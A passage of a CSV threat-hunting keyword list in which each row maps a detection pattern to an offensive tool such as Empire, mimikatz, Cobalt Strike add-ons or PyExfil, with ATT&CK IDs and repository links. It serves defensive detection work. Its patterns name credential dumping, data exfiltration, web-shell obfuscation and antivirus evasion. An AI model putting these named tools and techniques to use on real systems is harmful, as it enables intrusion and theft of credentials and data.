TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","1","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*-EmptyPassword-Users.txt*",".{0,1000}\-EmptyPassword\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Emulates a rightclick on the given coordinates*",".{0,1000}Emulates\sa\srightclick\son\sthe\sgiven\scoordinates.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*enable_persistence.py*",".{0,1000}enable_persistence\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*Enable_Privilege /Process:* /Privilege:*",".{0,1000}Enable_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*EnableAllParentPrivileges.c*",".{0,1000}EnableAllParentPrivileges\.c.{0,1000}","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*EnableAllParentPrivileges.exe*",".{0,1000}EnableAllParentPrivileges\.exe.{0,1000}","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*EnableAllTokenPrivs.exe.log*",".{0,1000}EnableAllTokenPrivs\.exe\.log.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*Enabled_Users1.txt*",".{0,1000}Enabled_Users1\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Enable-DuplicateToken*",".{0,1000}Enable\-DuplicateToken.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*EnableRDesktopImplant*",".{0,1000}EnableRDesktopImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Enable-SeAssignPrimaryTokenPrivilege*",".{0,1000}Enable\-SeAssignPrimaryTokenPrivilege.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Enable-SeDebugPrivilege*",".{0,1000}Enable\-SeDebugPrivilege.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Enable-SeDebugPrivilege*",".{0,1000}Enable\-SeDebugPrivilege.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*encdatavault2john.py*",".{0,1000}encdatavault2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*encfs2john.py*",".{0,1000}encfs2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*encode baseImage.jpg /etc/passwd newImage.jpg*",".{0,1000}encode\sbaseImage\.jpg\s\/etc\/passwd\snewImage\.jpg.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*encode_base64(xor_encrypt(""cmd /c *",".{0,1000}encode_base64\(xor_encrypt\(\""cmd\s\/c\s.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*encode_base64(xor_encrypt(""WScript.Shell""*",".{0,1000}encode_base64\(xor_encrypt\(\""WScript\.Shell\"".{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*encode_payload rc4 *.txt*",".{0,1000}encode_payload\src4\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*encode_xor_shellcode(*",".{0,1000}encode_xor_shellcode\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*EncodeGroup/AggressiveProxy*",".{0,1000}EncodeGroup\/AggressiveProxy.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*EncodeGroup/UAC-SilentClean*",".{0,1000}EncodeGroup\/UAC\-SilentClean.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*encodeScriptPolyglot*",".{0,1000}encodeScriptPolyglot.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*EncodeShellcode(*",".{0,1000}EncodeShellcode\(.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*encrypt.py *.bin -p * -o *.enc*",".{0,1000}encrypt\.py\s.{0,1000}\.bin\s\-p\s.{0,1000}\s\-o\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*encrypt/encryptFile.go*",".{0,1000}encrypt\/encryptFile\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*encrypt/encryptUrl.go*",".{0,1000}encrypt\/encryptUrl\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*Encrypt-Bytes*",".{0,1000}Encrypt\-Bytes.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*encrypted LSASS dump*",".{0,1000}encrypted\sLSASS\sdump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*encrypted_payload*",".{0,1000}encrypted_payload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*encrypted_sleep(ms:*",".{0,1000}encrypted_sleep\(ms\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*EncryptedPfx.py*",".{0,1000}EncryptedPfx\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "*EncryptedZIP.csproj*",".{0,1000}EncryptedZIP\.csproj.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*EncryptedZIP.exe*",".{0,1000}EncryptedZIP\.exe.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*encryptor -f *.exe -o *.enc*",".{0,1000}encryptor\s\-f\s.{0,1000}\.exe\s\-o\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*EncryptShellcode(*",".{0,1000}EncryptShellcode\(.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}Endpoint\-EE15B860\-9EEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*ENDTHISFILETRANSMISSIONEGRESSASSESS*",".{0,1000}ENDTHISFILETRANSMISSIONEGRESSASSESS.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*ENDTHISFILETRANSMISSIONEGRESSASSESS*",".{0,1000}ENDTHISFILETRANSMISSIONEGRESSASSESS.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Enelg52/KittyStager*",".{0,1000}Enelg52\/KittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Engineer_super.exe*",".{0,1000}Engineer_super\.exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*engjibo/NetUser*",".{0,1000}engjibo\/NetUser.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 